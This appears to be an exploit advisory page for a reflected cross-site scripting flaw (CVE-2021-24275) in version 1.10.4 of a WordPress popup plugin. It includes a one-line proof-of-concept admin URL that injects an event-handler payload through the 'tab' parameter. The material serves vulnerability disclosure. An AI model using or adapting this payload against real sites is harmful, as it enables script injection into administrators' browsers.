WordPress Popup plugin version 1.10.4 suffers from a cross site scripting vulnerability.
advisories | CVE-2021-24275
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-242751. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Related posts:
The Cost of a Siloed Response: How a Lack of Collaboration is Becoming Security’s Biggest Vulnerabil...
Here's how Sonos hopes to win back your trust after its app debacle
Iranian Cyber Group OilRig Targets Iraqi Government in Sophisticated Malware Attack
Microsoft shares script to update Windows 10 WinRE with BitLocker fixes
Researchers Disclose Details of Critical 'CosMiss' RCE Flaw Affecting Azure Cosmos DB